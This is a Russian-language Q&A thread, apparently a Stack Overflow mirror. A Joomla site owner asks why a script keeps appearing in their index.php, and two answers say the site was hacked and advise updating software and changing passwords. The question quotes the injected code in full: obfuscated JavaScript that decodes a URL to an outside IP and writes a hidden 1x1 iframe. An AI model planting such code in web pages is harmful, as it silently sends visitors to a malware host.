Страница index.php автоматически изменяется с одним скриптом в конце - PullRequest
0 голосов
/ 07 июня 2010

Я видел это, это произошло в два раза больше, в моем корневом файле index.php. Я добавил эту вещь

<html><body><script type='text/javascript'>str="<vdepognbt src=" + unescape('%68%74%74%70%3a%2f%2f%37%39%2e%31%33%35%2e%31%35%32%2e%31%38%31%2f%73%74%61%74%73%2f%67%6f%2e%70%68%70%3f%73%69%64%3d%31') + " Oaoz5='1'vxoq5='1'>";str = str.replace('vde', 'i');str =str.replace('pog', 'fr');str = str.replace('nbt', 'ame');str =str.replace('Oaoz5', 'width');str =str.replace('vxoq5','height');document.write(str);</script></body></html>

Кто-нибудь знает, что это такое и как оно приходит?

Когда я пытался открыть свой веб-сайт в Google Chrome, он сказал мне, что какое-то вредоносное программное обеспечение пытается запустить вредоносный веб-сайт, вы хотите разрешить это.

Как бы то ни было, когда удалили этот скрипт, все было в порядке

Но это дважды за 2 недели

Это вирус? как что-то изменить мой код

Я ИСПОЛЬЗУЮ JOOMLA

Ответы [ 2 ]

0 голосов
/ 07 июня 2010

Вас взломали. Вам необходимо изменить пароли FTP и MYSQL, обновить до последней версии Joomla (в настоящее время 1.5.18) и проверить все ваши компоненты и плагины на наличие уязвимостей в этом списке http://docs.joomla.org/Vulnerable_Extensions_List

0 голосов
/ 07 июня 2010

Ваш сайт был взломан. Вам необходимо убедиться, что ваша установка Joomla, все ее плагины и все остальное программное обеспечение на сервере обновлены до последних версий. Если это общий сервер, ваш хост может помочь. В противном случае обратитесь к журналам вашего сервера.

...